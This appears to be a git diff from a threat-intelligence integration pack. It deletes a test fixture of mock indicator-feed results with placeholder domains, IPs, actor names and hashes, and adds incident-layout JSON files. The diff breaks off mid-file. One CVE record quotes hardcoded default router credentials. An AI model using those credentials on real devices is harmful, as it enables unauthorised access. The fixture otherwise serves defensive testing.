a/Packs/GroupIB_ThreatIntelligenceAttribution/Integrations/GroupIB_TIA_Feed/test_data/results.json b/Packs/GroupIB_ThreatIntelligenceAttribution/Integrations/GroupIB_TIA_Feed/test_data/results.json deleted file mode 100644 index 968829223150..000000000000 --- a/Packs/GroupIB_ThreatIntelligenceAttribution/Integrations/GroupIB_TIA_Feed/test_data/results.json +++ /dev/null @@ -1,587 +0,0 @@ -{ - "compromised/mule": [ - { - "last_fetch": { - "compromised/mule": 1614413286419 - } - }, - [ - { - "rawJSON": { - "value": "3765123456411567", - "type": "GIB Compromised Mule", - "creationdate": "2020-11-11T16:09:00Z", - "source": "Botnet", - "gibcollection": "compromised/mule", - "gibid": "50a3b4abbfca5dcbec9c8b3a110598f61ba93r33", - "gibmalwarename": "Anubis", - "gibthreatactorid": "d7ff75c35f93dce6f5410bba9a6c206bdff66555", - "gibthreatactorisapt": false, - "gibthreatactorname": "FRK48", - "gibreliability": 100, - "gibcredibility": 80, - "gibadmiraltycode": "A2", - "gibseverity": "red" - } - }, - { - "rawJSON": { - "value": "http://some.ru", - "type": "URL", - "gibcollection": "compromised/mule", - "gibid": "50a3b4abbfca5dcbec9c8b3a110598f61ba93r33", - "gibmalwarename": "Anubis", - "gibthreatactorid": "d7ff75c35f93dce6f5410bba9a6c206bdff66555", - "gibthreatactorisapt": false, - "gibthreatactorname": "FRK48", - "gibreliability": 100, - "gibcredibility": 80, - "gibadmiraltycode": "A2", - "gibseverity": "red" - } - }, - { - "rawJSON": { - "value": "worus.space", - "type": "Domain", - "gibcollection": "compromised/mule", - "gibid": "50a3b4abbfca5dcbec9c8b3a110598f61ba93r33", - "gibmalwarename": "Anubis", - "gibthreatactorid": "d7ff75c35f93dce6f5410bba9a6c206bdff66555", - "gibthreatactorisapt": false, - "gibthreatactorname": "FRK48", - "gibreliability": 100, - "gibcredibility": 80, - "gibadmiraltycode": "A2", - "gibseverity": "red" - } - }, - { - "rawJSON": { - "value": "11.11.11.11", - "type": "IP", - "gibcollection": "compromised/mule", - "gibid": "50a3b4abbfca5dcbec9c8b3a110598f61ba93r33", - "gibmalwarename": "Anubis", - "gibthreatactorid": "d7ff75c35f93dce6f5410bba9a6c206bdff66555", - "gibthreatactorisapt": false, - "gibthreatactorname": "FRK48", - "gibreliability": 100, - "gibcredibility": 80, - "gibadmiraltycode": "A2", - "gibseverity": "red" - } - } - ] - ], - "compromised/imei": [ - { - "last_fetch": { - "compromised/imei": 1614889064899 - } - }, - [ - { - "rawJSON": { - "value": "http://some.ru", - "type": "URL", - "gibcollection": "compromised/imei", - "gibid": "0c1426048474df19ada9d0089ef8b3efce906556", - "gibmalwarename": "FlexNet", - "gibthreatactorid": "d7ff75c35f93dce6f5410bba9a6c206bdff66555", - "gibthreatactorisapt": false, - "gibthreatactorname": "FRK48", - "gibreliability": 100, - "gibcredibility": 80, - "gibadmiraltycode": "A2", - "gibseverity": "red" - } - }, - { - "rawJSON": { - "value": "some.ru", - "type": "Domain", - "gibcollection": "compromised/imei", - "gibid": "0c1426048474df19ada9d0089ef8b3efce906556", - "gibmalwarename": "FlexNet", - "gibthreatactorid": "d7ff75c35f93dce6f5410bba9a6c206bdff66555", - "gibthreatactorisapt": false, - "gibthreatactorname": "FRK48", - "gibreliability": 100, - "gibcredibility": 80, - "gibadmiraltycode": "A2", - "gibseverity": "red" - } - }, - { - "rawJSON": { - "value": "11.11.11.11", - "type": "IP", - "asn": "AS16276 OVH SAS", - "geocountry": "France", - "gibcollection": "compromised/imei", - "gibid": "0c1426048474df19ada9d0089ef8b3efce906556", - "gibmalwarename": "FlexNet", - "gibthreatactorid": "d7ff75c35f93dce6f5410bba9a6c206bdff66555", - "gibthreatactorisapt": false, - "gibthreatactorname": "FRK48", - "gibreliability": 100, - "gibcredibility": 80, - "gibadmiraltycode": "A2", - "gibseverity": "red" - } - }, - { - "rawJSON": { - "value": "359223056231009", - "type": "GIB Compromised IMEI", - "creationdate": "2018-01-11T01:18:43Z", - "devicemodel": "Nexus S/2.3.7 ($$$Flexnet v.5.5)", - "asn": "AS22222 Some Company", - "geocountry": "Netherlands", - "ipaddress": "11.11.11.11", - "gibcollection": "compromised/imei", - "gibid": "0c1426048474df19ada9d0089ef8b3efce906556", - "gibmalwarename": "FlexNet", - "gibthreatactorid": "d7ff75c35f93dce6f5410bba9a6c206bdff66555", - "gibthreatactorisapt": false, - "gibthreatactorname": "FRK48", - "gibreliability": 100, - "gibcredibility": 80, - "gibadmiraltycode": "A2", - "gibseverity": "red" - } - } - ] - ], - "attacks/ddos": [ - { - "last_fetch": { - "attacks/ddos": 1614476823510 - } - }, - [ - { - "rawJSON": { - "value": "isc.org", - "type": "Domain", - "firstseenbysource": "2020-10-16T02:58:53Z", - "lastseenbysource": "2020-10-16T02:58:55Z", - "gibcollection": "attacks/ddos", - "gibid": "26a05baa4025edff367b058b13c6b43e820538a5", - "gibreliability": 90, - "gibcredibility": 90, - "gibadmiraltycode": "A2", - "gibseverity": "red" - } - }, - { - "rawJSON": { - "value": "11.11.11.11", - "type": "IP", - "asn": "AS1280 Internet Systems Consortium, Inc.", - "geocountry": "United States", - "firstseenbysource": "2020-10-16T02:58:53Z", - "lastseenbysource": "2020-10-16T02:58:55Z", - "geolocation": "California", - "gibcollection": "attacks/ddos", - "gibid": "26a05baa4025edff367b058b13c6b43e820538a5", - "gibreliability": 90, - "gibcredibility": 90, - "gibadmiraltycode": "A2", - "gibseverity": "red" - } - } - ] - ], - "attacks/deface": [ - { - "last_fetch": { - "attacks/deface": 26326167 - } - }, - [ - { - "rawJSON": { - "gibcollection": "attacks/deface", - "gibid": "6009637a1135cd001ef46e21", - "type": "URL", - "value": "sadas.sadd.ee", - "gibthreatactorid": "d7ff75c35f93dce6f5410bba9a6c206bdff66555", - "gibthreatactorisapt": false, - "gibthreatactorname": "FRK48", - "gibreliability": 80, - "gibcredibility": 80, - "gibadmiraltycode": "B2", - "gibseverity": "orange" - } - }, - { - "rawJSON": { - "gibcollection": "attacks/deface", - "gibid": "6009637a1135cd001ef46e21", - "type": "Domain", - "value": "sadas.sadd.ee", - "gibthreatactorid": "d7ff75c35f93dce6f5410bba9a6c206bdff66555", - "gibthreatactorisapt": false, - "gibthreatactorname": "FRK48", - "gibreliability": 80, - "gibcredibility": 80, - "gibadmiraltycode": "B2", - "gibseverity": "orange" - } - }, - { - "rawJSON": { - "geocountry": "Indonesia", - "gibcollection": "attacks/deface", - "gibid": "6009637a1135cd001ef46e21", - "type": "IP", - "value": "11.11.11.11", - "gibthreatactorid": "d7ff75c35f93dce6f5410bba9a6c206bdff66555", - "gibthreatactorisapt": false, - "gibthreatactorname": "FRK48", - "gibreliability": 80, - "gibcredibility": 80, - "gibadmiraltycode": "B2", - "gibseverity": "orange" - } - } - ] - ], - "attacks/phishing": [ - { - "last_fetch": { - "attacks/phishing": 1614925293641 - } - }, - [ - { - "rawJSON": { - "gibcollection": "attacks/phishing", - "gibid": "fce7f92d0b64946cf890842d083953649b259952", - "type": "URL", - "value": "https://some.ru", - "gibphishingtype": "Phishing", - "gibreliability": 90, - "gibcredibility": 80, - "gibadmiraltycode": "A2", - "gibseverity": "red" - } - }, - { - "rawJSON": { - "creationdate": "2013-11-15T13:41:30Z", - "firstseenbysource": "2021-01-14T11:21:34Z", - "gibcollection": "attacks/phishing", - "gibid": "fce7f92d0b64946cf890842d083953649b259952", - "gibphishingtitle": "", - "gibtargetbrand": "Some brand", - "gibtargetcategory": "Finance > Banking", - "gibtargetdomain": "some.ru", - "registrarname": "Some", - "type": "Domain", - "value": "some.ru", - "gibphishingtype": "Phishing", - "gibreliability": 90, - "gibcredibility": 80, - "gibadmiraltycode": "A2", - "gibseverity": "red" - } - }, - { - "rawJSON": { - "geocountry": "Canada", - "geolocation": "NA", - "gibcollection": "attacks/phishing", - "gibid": "fce7f92d0b64946cf890842d083953649b259952", - "type": "IP", - "value": "11.11.11.11", - "gibphishingtype": "Phishing", - "gibreliability": 90, - "gibcredibility": 80, - "gibadmiraltycode": "A2", - "gibseverity": "red" - } - } - ] - ], - "attacks/phishing_kit": [{"last_fetch": {"attacks/phishing_kit": 1614921031175}}, []], - "apt/threat": [ - { - "last_fetch": { - "apt/threat": 16107218765545 - } - }, - [ - { - "rawJSON": { - "gibcollection": "apt/threat", - "gibid": "1b09d389d016121afbffe481a14b30ea995876e4", - "type": "IP", - "value": "11.11.11.11", - "gibmalwarename": "", - "gibthreatactorid": "5e9f20fdcf5876b5772b3d09b432f4080711ac5f", - "gibthreatactorisapt": true, - "gibthreatactorname": "Lazarus", - "gibreliability": 80, - "gibcredibility": 100, - "gibadmiraltycode": "B1", - "gibseverity": "orange" - } - }, - { - "rawJSON": { - "gibcollection": "apt/threat", - "gibid": "1b09d389d016121afbffe481a14b30ea995876e4", - "type": "IP", - "value": "11.11.11.11", - "gibmalwarename": "", - "gibthreatactorid": "5e9f20fdcf5876b5772b3d09b432f4080711ac5f", - "gibthreatactorisapt": true, - "gibthreatactorname": "Lazarus", - "gibreliability": 80, - "gibcredibility": 100, - "gibadmiraltycode": "B1", - "gibseverity": "orange" - } - }, - { - "rawJSON": { - "gibcollection": "apt/threat", - "gibid": "1b09d389d016121afbffe481a14b30ea995876e4", - "type": "Domain", - "value": "some.ru", - "gibmalwarename": "", - "gibthreatactorid": "5e9f20fdcf5876b5772b3d09b432f4080711ac5f", - "gibthreatactorisapt": true, - "gibthreatactorname": "Lazarus", - "gibreliability": 80, - "gibcredibility": 100, - "gibadmiraltycode": "B1", - "gibseverity": "orange" - } - }, - { - "rawJSON": { - "gibcollection": "apt/threat", - "gibid": "1b09d389d016121afbffe481a14b30ea995876e4", - "type": "URL", - "value": "https://some.ru", - "gibmalwarename": "", - "gibthreatactorid": "5e9f20fdcf5876b5772b3d09b432f4080711ac5f", - "gibthreatactorisapt": true, - "gibthreatactorname": "Lazarus", - "gibreliability": 80, - "gibcredibility": 100, - "gibadmiraltycode": "B1", - "gibseverity": "orange" - } - }, - { - "rawJSON": { - "gibcollection": "apt/threat", - "gibfilename": "5d43baf1c9e9e3a939e5defd8f8fbd8d", - "gibid": "1b09d389d016121afbffe481a14b30ea995876e4", - "md5": "5d43baf1c9e9e3a939e5defd8f8fbd8d", - "sha1": "d5ff73c043f3bb75dd749636307500b60a436550", - "sha256": "867c8b49d29ae1f6e4a7cd31b6fe7e278753a1ba03d4be338ed11fd1efc7dd36", - "type": "File", - "value": "5d43baf1c9e9e3a939e5defd8f8fbd8d", - "gibmalwarename": "", - "gibthreatactorid": "5e9f20fdcf5876b5772b3d09b432f4080711ac5f", - "gibthreatactorisapt": true, - "gibthreatactorname": "Lazarus", - "gibreliability": 80, - "gibcredibility": 100, - "gibadmiraltycode": "B1", - "gibseverity": "orange" - } - } - ] - ], - "suspicious_ip/tor_node": [ - { - "last_fetch": { - "suspicious_ip/tor_node": 16110967720000 - } - }, - [ - { - "rawJSON": { - "gibcollection": "suspicious_ip/tor_node", - "gibid": "11.11.11.11", - "type": "IP", - "value": "11.11.11.11", - "firstseenbysource": "2020-09-03T14:15:25Z", - "lastseenbysource": "2021-01-20T22:07:33Z", - "gibreliability": 90, - "gibcredibility": 90, - "gibadmiraltycode": "A1", - "gibseverity": "green" - } - } - ] - ], - "suspicious_ip/open_proxy": [ - { - "last_fetch": { - "suspicious_ip/open_proxy": 1614925979879 - } - }, - [ - { - "rawJSON": { - "geocountry": "Czech Republic", - "gibcollection": "suspicious_ip/open_proxy", - "gibid": "cc6a2856da2806b03839f81aa214f22dbcfd7369", - "gibproxyanonymous": "High anonymous / Elite proxy", - "gibproxyport": 80, - "source": "free-proxy-list.net", - "type": "IP", - "value": "11.11.11.11", - "firstseenbysource": "2020-03-19T23:01:01Z", - "lastseenbysource": "2021-01-21T11:01:02Z", - "gibreliability": 50, - "gibcredibility": 50, - "gibadmiraltycode": "C3", - "gibseverity": "green" - } - } - ] - ], - "suspicious_ip/socks_proxy": [ - { - "last_fetch": { - "suspicious_ip/socks_proxy": 1614926061941 - } - }, - [ - { - "rawJSON": { - "asn": "AS60999 Libatech SAL", - "geocountry": "Lebanon", - "gibcollection": "suspicious_ip/socks_proxy", - "gibid": "02e385600dfc5bf9b3b3656df8e0e20f5fc5c86e", - "type": "IP", - "value": "11.11.11.11", - "firstseenbysource": "2021-01-19T07:41:11Z", - "lastseenbysource": "2021-01-21T08:35:46Z", - "gibreliability": 90, - "gibcredibility": 100, - "gibadmiraltycode": "A1", - "gibseverity": "green" - } - } - ] - ], - "malware/cnc": [ - { - "last_fetch": { - "malware/cnc": 1614925981037 - } - }, - [ - { - "rawJSON": { - "gibcollection": "malware/cnc", - "gibid": "aeed277396e27e375d030a91533aa232444d0089", - "type": "URL", - "value": "https://some.ru", - "gibmalwarename": "JS Sniffer - Poter", - "firstseenbysource": "2021-01-21T10:35:21Z", - "lastseenbysource": "2021-01-21T10:35:21Z" - } - }, - { - "rawJSON": { - "gibcollection": "malware/cnc", - "gibid": "aeed277396e27e375d030a91533aa232444d0089", - "type": "Domain", - "value": "some.ru", - "gibmalwarename": "JS Sniffer - Poter", - "firstseenbysource": "2021-01-21T10:35:21Z", - "lastseenbysource": "2021-01-21T10:35:21Z" - } - }, - { - "rawJSON": { - "asn": "AS3356 Level 3 Communications, Inc.", - "geocountry": "United States", - "gibcollection": "malware/cnc", - "gibid": "aeed277396e27e375d030a91533aa232444d0089", - "type": "IP", - "value": "11.11.11.11", - "gibmalwarename": "JS Sniffer - Poter", - "firstseenbysource": "2021-01-21T10:35:21Z", - "lastseenbysource": "2021-01-21T10:35:21Z" - } - } - ] - ], - "osi/vulnerability": [ - { - "last_fetch": { - "osi/vulnerability": 16130451156953 - } - }, - [ - { - "rawJSON": { - "cvedescription": "An issue was discovered on FiberHome HG6245D devices through RP2613. The web daemon contains the hardcoded awnfibre / fibre@dm!n credentials for an ISP.", - "cvemodified": "2021-02-11T00:45:00+03:00", - "cvss": 7.5, - "gibcollection": "osi/vulnerability", - "gibcvssvector": "AV:N/AC:L/Au:N/C:P/I:P/A:P", - "gibid": "CVE-2021-27152", - "published": "2021-02-10T19:15:00+03:00", - "type": "CVE", - "value": "CVE-2021-27152", - "gibreliability": 100, - "gibcredibility": 100, - "gibadmiraltycode": "A1", - "gibseverity": "green" - } - } - ] - ], - "ioc/common": [ - { - "last_fetch": { - "ioc/common": 16408877331936 - } - }, - [ - { - "rawJSON": { - "gibcollection": "ioc/common", - "gibid": "1111111111111111111111111111111111111111", - "type": "URL", - "value": "https://some.ru", - "firstseenbysource": "2012-10-24T00:00:00Z", - "lastseenbysource": "2016-10-24T00:00:00Z" - } - }, - { - "rawJSON": { - "gibcollection": "ioc/common", - "gibid": "1111111111111111111111111111111111111111", - "type": "Domain", - "value": "some.ru", - "firstseenbysource": "2012-10-24T00:00:00Z", - "lastseenbysource": "2016-10-24T00:00:00Z" - } - }, - { - "rawJSON": { - "gibcollection": "ioc/common", - "gibid": "1111111111111111111111111111111111111111", - "type": "IP", - "value": "11.11.11.11", - "firstseenbysource": "2012-10-24T00:00:00Z", - "lastseenbysource": "2016-10-24T00:00:00Z" - } - } - ] - ] -} diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_APT_Threat_Layout.json b/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_APT_Threat_Layout.json new file mode 100644 index 000000000000..30fb5b1328dc --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_APT_Threat_Layout.json @@ -0,0 +1,392 @@ +{ + "description": "Layout for GIB APT Threat", + "detailsV2": { + "tabs": [ + { + "id": "summary", + "name": "Legacy Summary", + "type": "summary" + }, + { + "id": "caseinfoid", + "name": "Incident Info", + "sections": [ + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-fce71720-98b0-11e9-97d7-ed26ef9e46c8", + "isVisible": true, + "items": [ + { + "endCol": 2, + "fieldId": "type", + "height": 22, + "id": "incident-type-field", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "severity", + "height": 22, + "id": "incident-severity-field", + "index": 1, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "owner", + "height": 22, + "id": "incident-owner-field", + "index": 2, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "sourcebrand", + "height": 22, + "id": "incident-sourceBrand-field", + "index": 4, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "sourceinstance", + "height": 22, + "id": "incident-sourceInstance-field", + "index": 5, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "playbookid", + "height": 22, + "id": "incident-playbookId-field", + "index": 6, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "moved": false, + "name": "Case Details", + "static": false, + "w": 1, + "x": 0, + "y": 0 + }, + { + "h": 2, + "i": "caseinfoid-61263cc0-98b1-11e9-97d7-ed26ef9e46c8", + "maxW": 3, + "moved": false, + "name": "Notes", + "static": false, + "type": "notes", + "w": 1, + "x": 2, + "y": 0 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-6aabad20-98b1-11e9-97d7-ed26ef9e46c8", + "maxW": 3, + "moved": false, + "name": "Work Plan", + "static": false, + "type": "workplan", + "w": 1, + "x": 1, + "y": 0 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-770ec200-98b1-11e9-97d7-ed26ef9e46c8", + "isVisible": true, + "maxW": 3, + "moved": false, + "name": "Linked Incidents", + "static": false, + "type": "linkedIncidents", + "w": 1, + "x": 1, + "y": 8 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-842632c0-98b1-11e9-97d7-ed26ef9e46c8", + "maxW": 3, + "moved": false, + "name": "Child Incidents", + "static": false, + "type": "childInv", + "w": 1, + "x": 2, + "y": 4 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-4a31afa0-98ba-11e9-a519-93a53c759fe0", + "maxW": 3, + "moved": false, + "name": "Evidence", + "static": false, + "type": "evidence", + "w": 1, + "x": 2, + "y": 2 + }, + { + "displayType": "ROW", + "h": 2, + "hideName": false, + "i": "caseinfoid-7717e580-9bed-11e9-9a3f-8b4b2158e260", + "maxW": 3, + "moved": false, + "name": "Team Members", + "static": false, + "type": "team", + "w": 1, + "x": 2, + "y": 6 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-7ce69dd0-a07f-11e9-936c-5395a1acf11e", + "maxW": 3, + "moved": false, + "name": "Indicators", + "query": "", + "queryType": "input", + "static": false, + "type": "indicators", + "w": 2, + "x": 0, + "y": 6 + }, + { + "displayType": "CARD", + "h": 2, + "i": "caseinfoid-ac32f620-a0b0-11e9-b27f-13ae1773d289", + "items": [ + { + "endCol": 1, + "fieldId": "occurred", + "height": 22, + "id": "incident-occurred-field", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 1, + "fieldId": "dbotmodified", + "height": 22, + "id": "incident-modified-field", + "index": 1, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "dbotduedate", + "height": 22, + "id": "incident-dueDate-field", + "index": 2, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "dbotcreated", + "height": 22, + "id": "incident-created-field", + "index": 0, + "sectionItemType": "field", + "startCol": 1 + }, + { + "endCol": 2, + "fieldId": "dbotclosed", + "height": 22, + "id": "incident-closed-field", + "index": 1, + "sectionItemType": "field", + "startCol": 1 + } + ], + "maxW": 3, + "moved": false, + "name": "Timeline Information", + "static": false, + "w": 1, + "x": 1, + "y": 2 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-88e6bf70-a0b1-11e9-b27f-13ae1773d289", + "isVisible": true, + "items": [ + { + "endCol": 2, + "fieldId": "dbotclosed", + "height": 22, + "id": "incident-dbotClosed-field", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "closereason", + "height": 22, + "id": "incident-closeReason-field", + "index": 1, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "closenotes", + "height": 22, + "id": "incident-closeNotes-field", + "index": 2, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "moved": false, + "name": "Closing Information", + "static": false, + "w": 1, + "x": 0, + "y": 8 + }, + { + "displayType": "CARD", + "h": 2, + "i": "caseinfoid-e54b1770-a0b1-11e9-b27f-13ae1773d289", + "isVisible": true, + "items": [ + { + "dropEffect": "move", + "endCol": 2, + "fieldId": "details", + "height": 106, + "id": "incident-details-field", + "index": 0, + "listId": "caseinfoid-e54b1770-a0b1-11e9-b27f-13ae1773d289", + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "moved": false, + "name": "Investigation Data", + "static": false, + "w": 1, + "x": 0, + "y": 4 + }, + { + "displayType": "ROW", + "h": 2, + "hideName": false, + "i": "caseinfoid-88c8a3c0-6387-11ef-b29f-a384ad57ecea", + "items": [ + { + "endCol": 2, + "fieldId": "gibdatecreated", + "height": 22, + "id": "b159ec90-6387-11ef-b29f-a384ad57ecea", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibseverity", + "height": 22, + "id": "0c2fb550-6388-11ef-b29f-a384ad57ecea", + "index": 1, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibid", + "height": 22, + "id": "48ce5ac0-6388-11ef-b29f-a384ad57ecea", + "index": 2, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibdateofdetection", + "height": 22, + "id": "a9df23d0-6388-11ef-b29f-a384ad57ecea", + "index": 3, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "minH": 1, + "moved": false, + "name": "Information from GIB", + "static": false, + "w": 1, + "x": 0, + "y": 2 + } + ], + "type": "custom" + }, + { + "id": "warRoom", + "name": "War Room", + "type": "warRoom" + }, + { + "id": "workPlan", + "name": "Work Plan", + "type": "workPlan" + }, + { + "id": "evidenceBoard", + "name": "Evidence Board", + "type": "evidenceBoard" + }, + { + "id": "relatedIncidents", + "name": "Related Incidents", + "type": "relatedIncidents" + }, + { + "id": "canvas", + "name": "Canvas", + "type": "canvas" + } + ] + }, + "group": "incident", + "id": "GIB APT Threat Layout", + "name": "GIB APT Threat Layout", + "system": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_Attacks_DDOS_Layout.json b/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_Attacks_DDOS_Layout.json new file mode 100644 index 000000000000..85036da8dae4 --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_Attacks_DDOS_Layout.json @@ -0,0 +1,758 @@ +{ + "description": "Layout for GIB Attacks DDOS", + "detailsV2": { + "tabs": [ + { + "id": "summary", + "name": "Legacy Summary", + "type": "summary" + }, + { + "id": "caseinfoid", + "name": "Incident Info", + "sections": [ + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-fce71720-98b0-11e9-97d7-ed26ef9e46c8", + "isVisible": true, + "items": [ + { + "endCol": 2, + "fieldId": "type", + "height": 22, + "id": "incident-type-field", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "severity", + "height": 22, + "id": "incident-severity-field", + "index": 1, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "owner", + "height": 22, + "id": "incident-owner-field", + "index": 2, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "sourcebrand", + "height": 22, + "id": "incident-sourceBrand-field", + "index": 4, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "sourceinstance", + "height": 22, + "id": "incident-sourceInstance-field", + "index": 5, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "playbookid", + "height": 22, + "id": "incident-playbookId-field", + "index": 6, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "moved": false, + "name": "Case Details", + "static": false, + "w": 1, + "x": 0, + "y": 0 + }, + { + "h": 2, + "i": "caseinfoid-61263cc0-98b1-11e9-97d7-ed26ef9e46c8", + "maxW": 3, + "moved": false, + "name": "Notes", + "static": false, + "type": "notes", + "w": 1, + "x": 2, + "y": 0 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-6aabad20-98b1-11e9-97d7-ed26ef9e46c8", + "maxW": 3, + "moved": false, + "name": "Work Plan", + "static": false, + "type": "workplan", + "w": 1, + "x": 1, + "y": 0 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-770ec200-98b1-11e9-97d7-ed26ef9e46c8", + "isVisible": true, + "maxW": 3, + "moved": false, + "name": "Linked Incidents", + "static": false, + "type": "linkedIncidents", + "w": 1, + "x": 1, + "y": 13 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-842632c0-98b1-11e9-97d7-ed26ef9e46c8", + "maxW": 3, + "moved": false, + "name": "Child Incidents", + "static": false, + "type": "childInv", + "w": 1, + "x": 2, + "y": 4 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-4a31afa0-98ba-11e9-a519-93a53c759fe0", + "maxW": 3, + "moved": false, + "name": "Evidence", + "static": false, + "type": "evidence", + "w": 1, + "x": 2, + "y": 2 + }, + { + "displayType": "ROW", + "h": 2, + "hideName": false, + "i": "caseinfoid-7717e580-9bed-11e9-9a3f-8b4b2158e260", + "maxW": 3, + "moved": false, + "name": "Team Members", + "static": false, + "type": "team", + "w": 1, + "x": 2, + "y": 9 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-7ce69dd0-a07f-11e9-936c-5395a1acf11e", + "maxW": 3, + "moved": false, + "name": "Indicators", + "query": "", + "queryType": "input", + "static": false, + "type": "indicators", + "w": 2, + "x": 0, + "y": 11 + }, + { + "displayType": "CARD", + "h": 2, + "i": "caseinfoid-ac32f620-a0b0-11e9-b27f-13ae1773d289", + "items": [ + { + "endCol": 1, + "fieldId": "occurred", + "height": 22, + "id": "incident-occurred-field", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 1, + "fieldId": "dbotmodified", + "height": 22, + "id": "incident-modified-field", + "index": 1, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "dbotduedate", + "height": 22, + "id": "incident-dueDate-field", + "index": 2, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "dbotcreated", + "height": 22, + "id": "incident-created-field", + "index": 0, + "sectionItemType": "field", + "startCol": 1 + }, + { + "endCol": 2, + "fieldId": "dbotclosed", + "height": 22, + "id": "incident-closed-field", + "index": 1, + "sectionItemType": "field", + "startCol": 1 + } + ], + "maxW": 3, + "moved": false, + "name": "Timeline Information", + "static": false, + "w": 1, + "x": 0, + "y": 9 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-88e6bf70-a0b1-11e9-b27f-13ae1773d289", + "isVisible": true, + "items": [ + { + "endCol": 2, + "fieldId": "dbotclosed", + "height": 22, + "id": "incident-dbotClosed-field", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "closereason", + "height": 22, + "id": "incident-closeReason-field", + "index": 1, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "closenotes", + "height": 22, + "id": "incident-closeNotes-field", + "index": 2, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "moved": false, + "name": "Closing Information", + "static": false, + "w": 1, + "x": 0, + "y": 13 + }, + { + "displayType": "CARD", + "h": 2, + "i": "caseinfoid-e54b1770-a0b1-11e9-b27f-13ae1773d289", + "isVisible": true, + "items": [ + { + "endCol": 2, + "fieldId": "details", + "height": 22, + "id": "incident-details-field", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "moved": false, + "name": "Investigation Data", + "static": false, + "w": 1, + "x": 1, + "y": 9 + }, + { + "displayType": "ROW", + "h": 2, + "hideName": false, + "i": "caseinfoid-aeaabfb0-70fc-11ef-8b17-29df2efa74c4", + "items": [ + { + "endCol": 2, + "fieldId": "gibthreatactorid", + "height": 22, + "id": "ff2b6c00-70fc-11ef-8b17-29df2efa74c4", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibthreatactorname", + "height": 22, + "id": "0235c5d0-70fd-11ef-8b17-29df2efa74c4", + "index": 1, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibthreatactorisapt", + "height": 22, + "id": "04e99b30-70fd-11ef-8b17-29df2efa74c4", + "index": 2, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "minH": 1, + "moved": false, + "name": "Group-IB Threat Actor", + "static": false, + "w": 1, + "x": 1, + "y": 2 + }, + { + "displayType": "ROW", + "h": 2, + "hideName": false, + "i": "caseinfoid-af820ce0-70fc-11ef-8b17-29df2efa74c4", + "items": [ + { + "endCol": 2, + "fieldId": "gibddosrequestheadershash", + "height": 22, + "id": "3fc226a0-70fd-11ef-8b17-29df2efa74c4", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibddosrequestdatalink", + "height": 22, + "id": 